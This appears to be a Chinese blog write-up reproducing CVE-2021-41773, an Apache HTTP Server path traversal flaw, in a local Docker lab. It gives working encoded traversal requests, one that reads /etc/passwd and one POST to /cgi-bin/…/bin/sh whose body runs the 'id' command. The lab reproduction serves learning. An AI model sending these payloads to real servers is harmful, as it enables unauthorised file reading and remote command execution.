CVE-2021-41773目录遍历(文件穿越)漏洞复现

CVE-202141773目录遍历(文件穿越)漏洞

Kali Linux的docker环境下

首先将环境下载到本地

进入CVE-202141773漏洞环境文件夹,执行docker-compose up -d启动漏洞环境。

等待文件下载……

安装完成后重启服务

访问本地的8080端口

打开Burpsuite,构造get参数

GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1

转换为post参数

修改命令为

POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
echo Content-Type: text/plain; echo; id

在请求的正文下执行命令,此时漏洞产生,查看下id

whoami

  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值